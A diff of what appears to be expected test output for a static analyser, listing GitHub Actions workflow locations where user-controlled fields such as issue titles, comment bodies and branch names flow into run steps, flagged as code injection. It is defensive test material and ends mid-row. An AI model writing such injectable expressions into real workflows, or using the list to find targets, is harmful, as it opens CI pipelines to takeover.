| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | -| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | -| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | -| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | -| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | -| .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | ${{ toJSON(github) }} | -| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | -| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | +| .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | 